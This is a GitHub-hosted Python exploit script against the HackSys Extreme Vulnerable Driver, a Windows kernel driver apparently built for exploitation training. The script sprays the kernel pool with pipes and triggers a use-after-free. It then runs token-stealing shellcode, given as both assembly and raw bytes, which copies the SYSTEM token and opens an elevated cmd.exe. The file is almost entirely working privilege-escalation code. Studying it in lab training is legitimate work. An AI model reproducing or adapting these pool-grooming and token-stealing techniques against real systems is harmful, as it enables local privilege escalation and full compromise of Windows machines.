Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
207 lines (163 sloc) 6.88 KB
# -*- coding: utf-8 -*-
import sys
from ctypes import *
from ctypes.wintypes import *
import struct
import time
import os
kernel32 = windll.kernel32
ntdll = windll.ntdll
ALLOC_SIZE = 0x70 # Adjust this value to get chunk allocations of desired length
BUFSIZE = (ALLOC_SIZE - 0x48) # Calculating buffer size to allocate chunks of given length
handle_read_array1 = []
handle_write_array1 = []
handle_read_array2 = []
handle_write_array2 = []
METHOD_NEITHER = 0x3
FILE_ANY_ACCESS = 0x0
FILE_DEVICE_UNKNOWN = 0x00000022
def ctl_code(function,
devicetype = FILE_DEVICE_UNKNOWN,
access = FILE_ANY_ACCESS,
method = METHOD_NEITHER):
"""Recreate CTL_CODE macro to generate driver IOCTL"""
return ((devicetype << 16) | (access << 14) | (function << 2) | method)
def get_device_handle(device):
open_existing = 0x3
generic_read = 0x80000000
generic_write = 0x40000000
handle = kernel32.CreateFileA(device,
generic_read | generic_write,
None,
None,
open_existing,
0x40000080,
None)
if not handle:
print("\t[-] Unable to get device handle")
sys.exit(-1)
return handle
def spray():
# Massaging the Pool
print("[+] Starting to Spray Pool Memory (Filling Holes)")
# Allocating all needed pipes
for i in range(0, 50000):
readPipe = HANDLE()
writePipe = HANDLE()
# Create Pipe for content in Non-paged Pool
if not kernel32.CreatePipe(byref(readPipe),byref(writePipe),None,BUFSIZE):
print("[!] Failed to Create Pipe... exiting now")
sys.exit(-1)
# Keep the handles to prevent Garbage Collection
handle_read_array1.append(readPipe)
handle_write_array1.append(writePipe)
print("Writing buffer now!")
for handle in handle_write_array1:
# Write to the allocated
pipe_content = create_string_buffer("\x41"*BUFSIZE, BUFSIZE)
if not kernel32.WriteFile(handle, pipe_content, BUFSIZE, byref(resultLength), None):
print("[!] Failed to write to pipe... exiting now")
sys.exit(-2)
print("\t[*] Finished Filling Holes with {0} Objects".format(len(handle_write_array1)))
print("[+] Spraying 5k more for holes")
for i in range(0, 5000):
readPipe = HANDLE()
writePipe = HANDLE()
# Create Pipe for content in Non-paged Pool
if not kernel32.CreatePipe(byref(readPipe),byref(writePipe),None,BUFSIZE):
print("[!] Failed to Create Pipe... exiting now")
sys.exit(-1)
# Keep the handles to prevent Garbage Collection
handle_read_array2.append(readPipe)
handle_write_array2.append(writePipe)
for handle in handle_write_array2:
# Write to the allocated
pipe_content = create_string_buffer("\x41"*BUFSIZE, BUFSIZE)
if not kernel32.WriteFile(handle, pipe_content, BUFSIZE, byref(resultLength), None):
print("[!] Failed to write to pipe... exiting now")
sys.exit(-2)
print("[+] Grooming the spray!")
for handle in handle_read_array2[::2]:
buff = create_string_buffer(BUFSIZE+1)
if not kernel32.ReadFile(handle, buff, BUFSIZE, byref(resultLength), None):
print("[!] Failed to write to pipe... exiting now")
sys.exit(-2)
print("\t[*] Done Grooming!")
return
def virtual_alloc_payload():
payload_length, payload_address = heap_alloc_payload()
va_address = kernel32.VirtualAlloc(None, 1024, c_int(0x3000), c_int(0x40))
print("[+] VirtualAlloc address: 0x%X" % va_address)
print("[+] Copying payload to VirtualAlloc region")
memmove(va_address, payload_address, payload_length)
return va_address
def heap_alloc_payload():
"""
token_stealing_shellcode = (
start:
mov rdx, [gs:188h] ;KTHREAD pointer
mov r8, [rdx+70h] ;EPROCESS pointer
mov r9, [r8+188h] ;ActiveProcessLinks list head
mov rcx, [r9] ;follow link to first process in list
find_system:
mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId
cmp rdx, 4 ;UniqueProcessId == 4?
jz found_system ;YES - move on
mov rcx, [rcx] ;NO - load next entry in list
jmp find_system ;loop
found_system:
mov rax, [rcx+80h] ;offset to token
and al, 0f0h ;clear low 4 bits of _EX_FAST_REF structure
find_cmd:
mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId
cmp rdx, 1234h ;UniqueProcessId == ZZZZ? (PLACEHOLDER)
jz found_cmd ;YES - move on
mov rcx, [rcx] ;NO - next entry in list
jmp find_cmd ;loop
found_cmd:
mov [rcx+80h], rax ;copy SYSTEM token over top of this process's token
return:
ret
)
"""
token_stealing_shellcode = (
"\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4C\x8B\x42\x70\x4D\x8B\x88"
"\x88\x01\x00\x00\x49\x8B\x09\x48\x8B\x51\xF8\x48\x83\xFA\x04\x74"
"\x05\x48\x8B\x09\xEB\xF1\x48\x8B\x81\x80\x00\x00\x00\x24\xF0\x48"
"\x8B\x51\xF8\x48\x81\xFA" + struct.pack("<L", os.getpid()) + "\x74\x05\x48\x8B\x09\xEB"
"\xEE\x48\x89\x81\x80\x00\x00\x00\xC3"
)
payload_length = len(token_stealing_shellcode)
payload_address = id(token_stealing_shellcode) + 32
print("[+] Payload address: 0x%X" % payload_address)
return payload_length, payload_address
if __name__ == "__main__":
bytes_returned = c_ulong()
resultLength = c_ulong()
ioctl_Allocate_UAF_Object = ctl_code(0x804)
ioctl_Free_UAF_Object = ctl_code(0x806)
ioctl_Allocate_Fake_Object = ctl_code(0x807)
ioctl_Use_UAF_Object = ctl_code(0x805)
device_name = "\\\\.\\HackSysExtremeVulnerableDriver"
device_handle = get_device_handle(device_name)
print "[+] Constructing fake object"
shellcode_ptr = virtual_alloc_payload()
evil_input = struct.pack("<Q", shellcode_ptr) + "B" * 0x58 + "\x00"
evil_size = len(evil_input)
einput = create_string_buffer(evil_input, evil_size)
spray()
print("[+] Allocating UAF Object!")
# Allocating HackSys UAF Object
kernel32.DeviceIoControl(device_handle, ioctl_Allocate_UAF_Object, None, 0, None, 0, byref(bytes_returned), None)
print("[+] Freeing UAF Object!")
# Freeing the UAF Object
kernel32.DeviceIoControl(device_handle, ioctl_Free_UAF_Object, None, 0, None, 0, byref(bytes_returned), None)
print("[+] Spraying Fake Object!")
for i in range(0, 2500):
kernel32.DeviceIoControl(device_handle, ioctl_Allocate_Fake_Object, addressof(einput), evil_size, None, 0,byref(bytes_returned), None)
print "[+] Triggering UAF .."
kernel32.DeviceIoControl(device_handle, ioctl_Use_UAF_Object, None, 0, None, 0,byref(bytes_returned), None)
print "[+] Testing for High privileges!"
if 'system' in os.popen('whoami').read():
print "\t[*] Happy Times ;-) have fun with the system shell..."
os.system("cmd.exe")
You can’t perform that action at this time.